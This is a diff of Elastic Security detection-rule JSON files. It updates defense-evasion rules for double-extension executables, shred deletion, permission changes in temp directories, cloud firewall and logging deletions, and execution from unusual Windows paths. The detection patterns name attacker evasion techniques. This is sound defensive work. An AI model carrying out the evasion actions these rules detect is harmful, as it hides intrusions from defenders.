b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_creation_mult_extension.json @@ -12,10 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Executable File Creation with Multiple Extensions", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type == \"creation\" and file.extension : \"exe\" and\n file.name regex~ \"\"\".*\\.(vbs|vbe|bat|js|cmd|wsh|ps1|pdf|docx?|xlsx?|pptx?|txt|rtf|gif|jpg|png|bmp|hta|txt|img|iso)\\.exe\"\"\"\n", + "note": "", + "query": "file where event.type == \"creation\" and file.extension : \"exe\" and\n file.name regex~ \"\"\".*\\.(vbs|vbe|bat|js|cmd|wsh|ps1|pdf|docx?|xlsx?|pptx?|txt|rtf|gif|jpg|png|bmp|hta|txt|img|iso)\\.exe\"\"\" and\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"C:\\\\Users\\\\*\\\\QGIS_SCCM\\\\Files\\\\QGIS-OSGeo4W-*-Setup-x86_64.exe\") and\n file.path : \"?:\\\\Program Files\\\\QGIS *\\\\apps\\\\grass\\\\*.exe\") and\n not process.executable : (\"/bin/sh\", \"/usr/sbin/MailScanner\", \"/usr/bin/perl\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -39,9 +67,9 @@ "reference": "https://attack.mitre.org/techniques/T1036/", "subtechnique": [ { - "id": "T1036.004", - "name": "Masquerade Task or Service", - "reference": "https://attack.mitre.org/techniques/T1036/004/" + "id": "T1036.007", + "name": "Double File Extension", + "reference": "https://attack.mitre.org/techniques/T1036/007/" } ] } @@ -72,5 +100,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_deletion_via_shred.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_deletion_via_shred.json index 6d86f27cd52b4..cbfec77f7aa0d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_deletion_via_shred.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_deletion_via_shred.json @@ -12,6 +12,28 @@ "license": "Elastic License v2", "name": "File Deletion via Shred", "query": "event.category:process and event.type:(start or process_started) and process.name:shred and\n process.args:(\"-u\" or \"--remove\" or \"-z\" or \"--zero\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "a1329140-8de3-4445-9f87-908fb6d824f4", "severity": "low", @@ -48,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_mod_writable_dir.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_mod_writable_dir.json index be7e8b71694ba..d3f90a2c91f79 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_mod_writable_dir.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_mod_writable_dir.json @@ -15,6 +15,33 @@ "license": "Elastic License v2", "name": "File Permission Modification in Writable Directory", "query": "event.category:process and event.type:(start or process_started) and\n process.name:(chmod or chown or chattr or chgrp) and\n process.working_directory:(/tmp or /var/tmp or /dev/shm) and\n not user.name:root\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9f9a2a82-93a8-4b1a-8778-1780895626d4", "severity": "low", @@ -44,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_firewall_policy_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_firewall_policy_deletion.json index 7d5bf5af25ea6..3a290c0c59e7d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_firewall_policy_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_firewall_policy_deletion.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Firewall Policy Deletion", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/firewall-manager/policy-overview" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e02bd3ea-72c6-4181-ac2b-0f83d17ad969", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -56,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_from_unusual_directory.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_from_unusual_directory.json new file mode 100644 index 0000000000000..8d64d3218396e --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_from_unusual_directory.json @@ -0,0 +1,72 @@ +{ + "author": [ + "Elastic" + ], + "description": "Identifies process execution from suspicious default Windows directories. This is sometimes done by adversaries to hide malware in trusted paths.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Execution from an Unusual Directory", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n /* add suspicious execution paths here */\nprocess.executable : (\"C:\\\\PerfLogs\\\\*.exe\",\"C:\\\\Users\\\\Public\\\\*.exe\",\"C:\\\\Windows\\\\Tasks\\\\*.exe\",\"C:\\\\Intel\\\\*.exe\",\"C:\\\\AMD\\\\Temp\\\\*.exe\",\"C:\\\\Windows\\\\AppReadiness\\\\*.exe\",\n\"C:\\\\Windows\\\\ServiceState\\\\*.exe\",\"C:\\\\Windows\\\\security\\\\*.exe\",\"C:\\\\Windows\\\\IdentityCRL\\\\*.exe\",\"C:\\\\Windows\\\\Branding\\\\*.exe\",\"C:\\\\Windows\\\\csc\\\\*.exe\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*.exe\",\"C:\\\\Windows\\\\en-US\\\\*.exe\",\"C:\\\\Windows\\\\wlansvc\\\\*.exe\",\"C:\\\\Windows\\\\Prefetch\\\\*.exe\",\"C:\\\\Windows\\\\Fonts\\\\*.exe\",\n \"C:\\\\Windows\\\\diagnostics\\\\*.exe\",\"C:\\\\Windows\\\\TAPI\\\\*.exe\",\"C:\\\\Windows\\\\INF\\\\*.exe\",\"C:\\\\Windows\\\\System32\\\\Speech\\\\*.exe\",\"C:\\\\windows\\\\tracing\\\\*.exe\",\n \"c:\\\\windows\\\\IME\\\\*.exe\",\"c:\\\\Windows\\\\Performance\\\\*.exe\",\"c:\\\\windows\\\\intel\\\\*.exe\",\"c:\\\\windows\\\\ms\\\\*.exe\",\"C:\\\\Windows\\\\dot3svc\\\\*.exe\",\n \"C:\\\\Windows\\\\panther\\\\*.exe\",\"C:\\\\Windows\\\\RemotePackages\\\\*.exe\",\"C:\\\\Windows\\\\OCR\\\\*.exe\",\"C:\\\\Windows\\\\appcompat\\\\*.exe\",\"C:\\\\Windows\\\\apppatch\\\\*.exe\",\"C:\\\\Windows\\\\addins\\\\*.exe\",\n \"C:\\\\Windows\\\\Setup\\\\*.exe\",\"C:\\\\Windows\\\\Help\\\\*.exe\",\"C:\\\\Windows\\\\SKB\\\\*.exe\",\"C:\\\\Windows\\\\Vss\\\\*.exe\",\"C:\\\\Windows\\\\Web\\\\*.exe\",\"C:\\\\Windows\\\\servicing\\\\*.exe\",\"C:\\\\Windows\\\\CbsTemp\\\\*.exe\",\n \"C:\\\\Windows\\\\Logs\\\\*.exe\",\"C:\\\\Windows\\\\WaaS\\\\*.exe\",\"C:\\\\Windows\\\\ShellExperiences\\\\*.exe\",\"C:\\\\Windows\\\\ShellComponents\\\\*.exe\",\"C:\\\\Windows\\\\PLA\\\\*.exe\",\n \"C:\\\\Windows\\\\Migration\\\\*.exe\",\"C:\\\\Windows\\\\debug\\\\*.exe\",\"C:\\\\Windows\\\\Cursors\\\\*.exe\",\"C:\\\\Windows\\\\Containers\\\\*.exe\",\"C:\\\\Windows\\\\Boot\\\\*.exe\",\"C:\\\\Windows\\\\bcastdvr\\\\*.exe\",\n \"C:\\\\Windows\\\\assembly\\\\*.exe\",\"C:\\\\Windows\\\\TextInput\\\\*.exe\",\"C:\\\\Windows\\\\security\\\\*.exe\",\"C:\\\\Windows\\\\schemas\\\\*.exe\",\"C:\\\\Windows\\\\SchCache\\\\*.exe\",\"C:\\\\Windows\\\\Resources\\\\*.exe\",\n \"C:\\\\Windows\\\\rescache\\\\*.exe\",\"C:\\\\Windows\\\\Provisioning\\\\*.exe\",\"C:\\\\Windows\\\\PrintDialog\\\\*.exe\",\"C:\\\\Windows\\\\PolicyDefinitions\\\\*.exe\",\"C:\\\\Windows\\\\media\\\\*.exe\",\n \"C:\\\\Windows\\\\Globalization\\\\*.exe\",\"C:\\\\Windows\\\\L2Schemas\\\\*.exe\",\"C:\\\\Windows\\\\LiveKernelReports\\\\*.exe\",\"C:\\\\Windows\\\\ModemLogs\\\\*.exe\",\"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*.exe\") and\n not process.name : (\"SpeechUXWiz.exe\",\"SystemSettings.exe\",\"TrustedInstaller.exe\",\"PrintDialog.exe\",\"MpSigStub.exe\",\"LMS.exe\",\"mpam-*.exe\") and\n not process.executable :\n (\"?:\\\\Intel\\\\Wireless\\\\WUSetupLauncher.exe\",\n \"?:\\\\Intel\\\\Wireless\\\\Setup.exe\",\n \"?:\\\\Intel\\\\Move Mouse.exe\",\n \"?:\\\\windows\\\\Panther\\\\DiagTrackRunner.exe\",\n \"?:\\\\Windows\\\\servicing\\\\GC64\\\\tzupd.exe\",\n \"?:\\\\Users\\\\Public\\\\res\\\\RemoteLite.exe\",\n \"?:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\*.exe\",\n \"?:\\\\Users\\\\Public\\\\Documents\\\\syspin.exe\",\n \"?:\\\\Users\\\\Public\\\\res\\\\FileWatcher.exe\")\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Windows", + "Threat Detection", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_frontdoor_firewall_policy_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_frontdoor_firewall_policy_deletion.json index a0b97a358ff07..afc0b209ff530 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_frontdoor_firewall_policy_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_frontdoor_firewall_policy_deletion.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Frontdoor Web Application Firewall (WAF) Policy Deleted", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.NETWORK/FRONTDOORWEBAPPLICATIONFIREWALLPOLICIES/DELETE\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#networking" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "09d028a5-dcde-409f-8ae0-557cef1b7082", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -56,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_created.json index ff2a20f85d3e3..1339f91df6d0c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_created.json @@ -2,7 +2,7 @@ "author": [ "Elastic" ], - "description": "Identifies when a firewall rule is created in Google Cloud Platform (GCP). Virtual Private Cloud (VPC) firewall rules can be configured to allow or deny connections to or from virtual machine (VM) instances. An adversary may create a new firewall rule in order to weaken their target's security controls and allow more permissive ingress or egress traffic flows for their benefit.", + "description": "Identifies when a firewall rule is created in Google Cloud Platform (GCP) for Virtual Private Cloud (VPC) or App Engine. These firewall rules can be configured to allow or deny connections to or from virtual machine (VM) instances or specific applications. An adversary may create a new firewall rule in order to weaken their target's security controls and allow more permissive ingress or egress traffic flows for their benefit.", "false_positives": [ "Firewall rules may be created by system administrators. Verify that the firewall configuration change was expected. Exceptions can be added to this rule to filter expected behavior." ], @@ -13,13 +13,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Firewall Rule Creation", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:v*.compute.firewalls.insert\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:(*.compute.firewalls.insert or google.appengine.*.Firewall.Create*Rule)\n", "references": [ - "https://cloud.google.com/vpc/docs/firewalls" + "https://cloud.google.com/vpc/docs/firewalls", + "https://cloud.google.com/appengine/docs/standard/python/understanding-firewalls" + ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } ], "risk_score": 21, "rule_id": "30562697-9859-4ae0-a8c5-dab45d664170", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -48,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_deleted.json index 3fc9b6bc49d3d..3a9e602fba8c2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_deleted.json @@ -2,7 +2,7 @@ "author": [ "Elastic" ], - "description": "Identifies when a firewall rule is deleted in Google Cloud Platform (GCP). Virtual Private Cloud (VPC) firewall rules can be configured to allow or deny connections to or from virtual machine (VM) instances. An adversary may delete a firewall rule in order to weaken their target's security controls.", + "description": "Identifies when a firewall rule is deleted in Google Cloud Platform (GCP) for Virtual Private Cloud (VPC) or App Engine. These firewall rules can be configured to allow or deny connections to or from virtual machine (VM) instances or specific applications. An adversary may delete a firewall rule in order to weaken their target's security controls.", "false_positives": [ "Firewall rules may be deleted by system administrators. Verify that the firewall configuration change was expected. Exceptions can be added to this rule to filter expected behavior." ], @@ -13,13 +13,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Firewall Rule Deletion", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:v*.compute.firewalls.delete\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:(*.compute.firewalls.delete or google.appengine.*.Firewall.Delete*Rule)\n", "references": [ - "https://cloud.google.com/vpc/docs/firewalls" + "https://cloud.google.com/vpc/docs/firewalls", + "https://cloud.google.com/appengine/docs/standard/python/understanding-firewalls" + ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } ], "risk_score": 47, "rule_id": "ff9b571e-61d6-4f6c-9561-eb4cca3bafe1", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -48,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_modified.json index e6ad1fc554183..51edd488e69fb 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_firewall_rule_modified.json @@ -2,7 +2,7 @@ "author": [ "Elastic" ], - "description": "Identifies when a firewall rule is modified in Google Cloud Platform (GCP). Virtual Private Cloud (VPC) firewall rules can be configured to allow or deny connections to or from virtual machine (VM) instances. An adversary may modify a firewall rule in order to weaken their target's security controls.", + "description": "Identifies when a firewall rule is modified in Google Cloud Platform (GCP) for Virtual Private Cloud (VPC) or App Engine. These firewall rules can be modified to allow or deny connections to or from virtual machine (VM) instances or specific applications. An adversary may modify an existing firewall rule in order to weaken their target's security controls and allow more permissive ingress or egress traffic flows for their benefit.", "false_positives": [ "Firewall rules may be modified by system administrators. Verify that the firewall configuration change was expected. Exceptions can be added to this rule to filter expected behavior." ], @@ -13,13 +13,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Firewall Rule Modification", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:v*.compute.firewalls.patch\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:(*.compute.firewalls.patch or google.appengine.*.Firewall.Update*Rule)\n", "references": [ - "https://cloud.google.com/vpc/docs/firewalls" + "https://cloud.google.com/vpc/docs/firewalls", + "https://cloud.google.com/appengine/docs/standard/python/understanding-firewalls" + ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } ], "risk_score": 47, "rule_id": "2783d84f-5091-4d7d-9319-9fceda8fa71b", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -48,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_bucket_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_bucket_deletion.json index 73033ad852590..88f712ea82514 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_bucket_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_bucket_deletion.json @@ -13,14 +13,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Logging Bucket Deletion", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.logging.v*.ConfigServiceV*.DeleteBucket and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.DeleteBucket and event.outcome:success\n", "references": [ "https://cloud.google.com/logging/docs/buckets", "https://cloud.google.com/logging/docs/storage" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "5663b693-0dea-4f2e-8275-f1ae5ff2de8e", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_sink_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_sink_deletion.json index f604365ca46e6..ab27264fe76e7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_sink_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_logging_sink_deletion.json @@ -13,13 +13,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Logging Sink Deletion", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.logging.v*.ConfigServiceV*.DeleteSink and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.DeleteSink and event.outcome:success\n", "references": [ "https://cloud.google.com/logging/docs/export" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "51859fa0-d86b-4214-bf48-ebb30ed91305", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -48,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_subscription_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_subscription_deletion.json index b3fe5da917406..8980df008011c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_subscription_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_subscription_deletion.json @@ -13,13 +13,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Pub/Sub Subscription Deletion", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.pubsub.v*.Subscriber.DeleteSubscription and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.pubsub.v*.Subscriber.DeleteSubscription and event.outcome:success\n", "references": [ "https://cloud.google.com/pubsub/docs/overview" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "cc89312d-6f47-48e4-a87c-4977bd4633c3", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -48,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_topic_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_topic_deletion.json index 2b90f7601204f..3b8f17f836468 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_topic_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_pub_sub_topic_deletion.json @@ -13,13 +13,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Pub/Sub Topic Deletion", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.pubsub.v*.Publisher.DeleteTopic and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.DeleteTopic and event.outcome:success\n", "references": [ "https://cloud.google.com/pubsub/docs/overview" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "3202e172-01b1-4738-a932-d024c514ba72", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -48,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_configuration_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_configuration_modified.json index 063e844c990be..4ad9794870d03 100644 --- 